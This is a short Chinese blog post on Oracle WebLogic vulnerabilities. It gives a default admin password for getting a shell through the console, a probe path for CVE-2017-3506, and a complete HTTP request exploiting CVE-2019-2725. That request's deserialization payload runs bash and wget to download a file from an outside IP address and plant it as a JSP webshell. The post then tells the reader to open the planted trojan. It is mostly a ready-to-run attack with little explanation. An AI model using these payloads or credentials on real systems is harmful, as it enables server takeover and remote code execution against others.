WebLogic

最新推荐文章于 2024-08-27 13:48:21 发布

╰落叶梧桐细数悲伤゛

最新推荐文章于 2024-08-27 13:48:21 发布

阅读量256

点赞数 10

分类专栏：常见中间件漏洞文章标签：安全

本文链接：https://blog.csdn.net/qq_66105152/article/details/140965500

版权

常见中间件漏洞专栏收录该内容

3 篇文章 0 订阅

订阅专栏

后台弱口令GetShell

默认账号密码：weblogic/Oracle@123

拼接路径 /console/login/LoginForm.jsp

CVE-2017-3506

1.检验是否存在wls-wsat组件

/wls-wsat/CoordinatorPortType

CVE-2019-2725

/_async/AsyncResponseService

抓包

POST /_async/AsyncResponseService HTTP/1.1
Host: 124.221.58.83:8604
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 838
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://114.132.92.17/2.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/12121.jsp
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header><soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

替换包

访问植入的木马